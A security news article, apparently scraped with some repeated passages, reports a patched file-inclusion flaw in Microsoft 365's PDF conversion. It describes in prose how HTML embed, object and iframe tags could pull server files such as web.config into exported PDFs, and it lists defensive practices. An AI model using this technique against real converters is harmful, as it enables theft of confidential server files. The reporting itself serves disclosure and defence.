A recently disclosed Local File Inclusion (LFI) vulnerability in Microsoft 365's PDF export functionality has raised significant security concerns. This flaw allowed attackers to access sensitive local system files during the PDF conversion process, potentially exposing confidential information. Microsoft has since patched the vulnerability, awarding the researcher a $3,000 bounty for the discovery.
The vulnerability was uncovered during a routine client assessment when a security researcher examined a web application's feature that converted documents to PDF format and published them on SharePoint. Initially, the researcher suspected a client-side issue, as the system appeared capable of reading local system files during HTML-to-PDF conversions. However, further investigation revealed that the application was utilizing Microsoft's official APIs, indicating that the flaw resided within Microsoft's infrastructure.
The exploitation process involved three steps:
Organizations utilizing similar functionalities should:
Source: Cyber Press LFI Vulnerability in Microsoft 365 PDF Export Lets Attackers Access Confidential Files
Discovery and Initial Assessment
The vulnerability was uncovered during a routine client assessment when a security researcher examined a web application's feature that converted documents to PDF format and published them on SharePoint. Initially, the researcher suspected a client-side issue, as the system appeared capable of reading local system files during HTML-to-PDF conversions. However, further investigation revealed that the application was utilizing Microsoft's official APIs, indicating that the flaw resided within Microsoft's infrastructure.Technical Details and Exploitation
The core of the vulnerability lay in the Microsoft Graph APIs, which facilitate file downloads in various formats. While Microsoft's documentation lists supported file types for PDF conversion, the researcher discovered an undocumented behavior allowing HTML-to-PDF conversion. By embedding specific HTML tags—such as<embed>, <object>, and <iframe>—into HTML content, attackers could include local files from the server's file system into the resulting PDF. This method enabled access to sensitive server-side data, including configuration files like web.config and win.ini.The exploitation process involved three steps:
- Uploading a malicious HTML file via the Graph API.
- Requesting the file in PDF format through the conversion service.
- Downloading the resulting PDF containing the included local resources.
Microsoft's Response and Remediation
Upon disclosure, Microsoft classified the vulnerability as "Important" and promptly addressed the issue. The $3,000 bounty awarded reflects the significant potential impact of this security flaw, which could have compromised sensitive data across Microsoft's cloud infrastructure.Broader Implications and Best Practices
This incident underscores the critical importance of thorough security testing for cloud-based file conversion services. It also highlights the value of responsible disclosure practices in identifying and mitigating critical vulnerabilities.Organizations utilizing similar functionalities should:
- Conduct Regular Security Assessments: Regularly test and evaluate web applications and APIs for vulnerabilities.
- Implement Strict Input Validation: Ensure that all user inputs are properly sanitized to prevent malicious code execution.
- Monitor and Audit API Usage: Keep track of API calls and monitor for unusual activities that could indicate exploitation attempts.
- Stay Informed on Security Updates: Regularly update systems and apply patches to address known vulnerabilities promptly.
Source: Cyber Press LFI Vulnerability in Microsoft 365 PDF Export Lets Attackers Access Confidential Files
